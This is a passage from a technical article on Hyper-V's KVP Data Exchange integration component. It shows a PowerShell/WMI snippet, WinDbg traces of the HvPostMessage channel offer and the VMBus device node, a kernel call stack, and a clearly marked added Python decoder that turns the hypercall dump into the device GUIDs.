style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">]</span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$_</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SelectSingleNode(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"/INSTANCE/PROPERTY[@NAME='Name']/VALUE[child::text() = 'KvPDataKey']"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkblue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (</span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-ne</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$null</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SelectSingleNode(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"/INSTANCE/PROPERTY[@NAME='Data']/VALUE/child::text()"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Value </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> } </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The script returns the value of the key KvPDataKey:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="40" src="https://lh3.googleusercontent.com/FUrqOA4ikYsUyFDPyVEkQczgLRPfC_kqnSVIlyp2ErQAqRRjWI1dBDAlwCYamW5SPTrH5x-uota5Y_H6ts5P31O7lL-nls9isqbosJ7AA_av7MOs43v6sU3CvR4hrfqZg0x791WS2Djk9WBc" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="134" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note that the script first retrieves the whole set of available values with </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm.GetRelated("Msvm_KvpExchangeComponent").GuestExchangeItems and only then parses every returned object looking for the key KvPDataKey. Accordingly, the script works only when the Data Exchange integration component is enabled in the virtual machine properties.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When the Data Exchange component is activated, the root OS sends the guest OS a message with the code CHANNELMSG_OFFERCHANNEL through the hypercall HvPostMessage:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rcx – rcx is the input parameter for the hypercall HvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff000 00000001 00000000 00000001 000000c4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff010 00000001 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a9a0f4e7 4d965a45</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff020 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">848a27b8 e6038c1e 242ff919 418007db</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff030 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6cb82e9c 558c8cb6 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff040 00000000 00000000 00000011 00000004</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note that the message data contains the GUIDs of the device that is connected to the vmbus as a child device:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devnode \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dumping IopRootDeviceNode (= 0xffffe0002bd2ed30)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DevNode </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xffffe0002bd2ed30</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for PDO 0xffffe0002bd2fe50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devnode 0xffffe0002bd2ed30 1 vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DevNode 0xffffe0002c03cd30 for PDO 0xffffe0002c00db00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> InstancePath is "VMBUS\</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{a9a0f4e7-5a45-4d96-b827-8a841e8c03e6}\{242ff919-07db-4180-9c2e-b86cb68c8c55</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> State = DeviceNodeStarted (0x308)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Previous State = DeviceNodeEnumerateCompletion (0x30d)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………</span></div>
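<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Added example (not code from the original article): a small Python decoder that takes the dd @rcx dump above, splits the HvPostMessage input header from its VMBus payload, and recovers the interface-type and instance GUIDs in the mixed-endian form that !devnode prints in the InstancePath. The field layout it assumes (ConnectionId, Reserved, MessageType, PayloadSize, then the VMBus message header followed by the offer's two GUIDs) is my assumption about the structures, not something the article spells out; the dump only covers the first 0x50 bytes, so the decoder also reports that the payload is truncated.</span></div>

```python
"""Decode the `dd @rcx` dump of an HvPostMessage input buffer.

Added example, not from the original article. Assumed layout:
  HV_INPUT_POST_MESSAGE: ConnectionId u32, Reserved u32, MessageType u32,
                         PayloadSize u32, Payload[]
  Payload: VMBus header (msgtype u32, padding u32), then the channel offer,
           whose first two fields are the interface-type GUID and the
           interface-instance GUID.
"""
import struct
import uuid

# Constructed input: the dd output copied from the article.
DD_OUTPUT = """\
00000080`002ff000 00000001 00000000 00000001 000000c4
00000080`002ff010 00000001 00000000 a9a0f4e7 4d965a45
00000080`002ff020 848a27b8 e6038c1e 242ff919 418007db
00000080`002ff030 6cb82e9c 558c8cb6 00000000 00000000
00000080`002ff040 00000000 00000000 00000011 00000004
"""

CHANNELMSG_OFFERCHANNEL = 1  # VMBus message type of a channel offer


def dd_to_bytes(text: str) -> bytes:
    """Turn `dd` output back into the raw bytes it describes.

    Each line is `<address> <dword> <dword> ...`; dd prints each dword as
    the CPU stores it (little-endian), so every word is re-packed as '<I'.
    """
    out = bytearray()
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        for word in parts[1:]:  # skip the address column
            out += struct.pack("<I", int(word, 16))
    return bytes(out)


def decode_post_message(raw: bytes) -> dict:
    """Split the HvPostMessage input header from its payload."""
    if len(raw) < 16:
        raise ValueError("buffer shorter than the HvPostMessage input header")
    conn_id, _reserved, msg_type, payload_size = struct.unpack_from("<IIII", raw, 0)
    payload = raw[16:16 + payload_size]
    return {
        "connection_id": conn_id,
        "hv_message_type": msg_type,
        "payload_size": payload_size,
        "payload": payload,
        # A dd dump of a few lines usually shows less than PayloadSize bytes.
        "payload_truncated": len(payload) < payload_size,
    }


def decode_offer(payload: bytes) -> dict:
    """Decode the VMBus header and the two GUIDs of a CHANNELMSG_OFFERCHANNEL."""
    if len(payload) < 8 + 32:
        raise ValueError("payload too short for a channel offer header")
    vmbus_msg_type, _padding = struct.unpack_from("<II", payload, 0)
    if vmbus_msg_type != CHANNELMSG_OFFERCHANNEL:
        raise ValueError(f"not a channel offer: vmbus msgtype {vmbus_msg_type}")
    # Windows stores GUIDs mixed-endian (Data1/2/3 little-endian, Data4 as-is);
    # uuid.UUID(bytes_le=...) performs exactly that conversion.
    if_type = uuid.UUID(bytes_le=payload[8:24])
    if_instance = uuid.UUID(bytes_le=payload[24:40])
    return {"vmbus_msg_type": vmbus_msg_type,
            "if_type": if_type, "if_instance": if_instance}


def vmbus_instance_path(if_type: uuid.UUID, if_instance: uuid.UUID) -> str:
    """Build the PnP InstancePath form that `!devnode` prints for the child device."""
    return f"VMBUS\\{{{if_type}}}\\{{{if_instance}}}"


def decode_dump(text: str) -> dict:
    """Full pipeline: dd text -> header fields, GUIDs and the expected InstancePath."""
    header = decode_post_message(dd_to_bytes(text))
    offer = decode_offer(header["payload"])
    return {
        "connection_id": header["connection_id"],
        "payload_size": header["payload_size"],
        "payload_truncated": header["payload_truncated"],
        "if_type": str(offer["if_type"]),
        "if_instance": str(offer["if_instance"]),
        "instance_path": vmbus_instance_path(offer["if_type"], offer["if_instance"]),
    }


if __name__ == "__main__":
    for key, value in decode_dump(DD_OUTPUT).items():
        print(f"{key:18} {value}")
```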
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After this, the function vmbus!InstanceDeviceControl is called in the guest OS. The entire stack looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IoAllocateMdl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceCloseChannel+0x22d (return to function without symbol name)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceDeviceControl+0x118</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::DispatchRequestToDriver+0x1be</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::DispatchEvents+0x363</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::QueueRequest+0x8d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxDevice::DispatchWithLock+0xb51</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpSynchronousIoControl+0xa7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpClientOpenChannel+0x2a6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpClientFindVmbusAndUnlock+0x162</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!VmbChannelEnable+0x231</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeStartChannel+0x9e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeAccept+0x81</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceCreate+0x90</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxFileObjectFileCreate::Invoke+0x3f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxPkgGeneral::OnCreate+0xb16</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxPkgGeneral::Dispatch+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxDevice::DispatchWithLock+0x7d8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopParseDevice+0x7b3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ObpLookupObjectName+0x6d8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ObOpenObjectByName+0x1e3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopCreateFile+0x372</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtCreateFile+0x78</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtCreateFile+0xa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNELBASE!CreateFileInternal+0x30a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNELBASE!CreateFileW+0x66</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbuspipe!VmbusPipeClientOpenChannel+0x44</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">icsvc!ICTransportVMBus::ClientNotification+0x60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbuspipe!VmbusPipeClientEnumeratePipes+0x1ac</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICTransportVMBusClient::Open+0xe5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICEndpoint::Connect+0x66</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::Run+0x65</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICKvpExchangeChild::Run+0x189</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
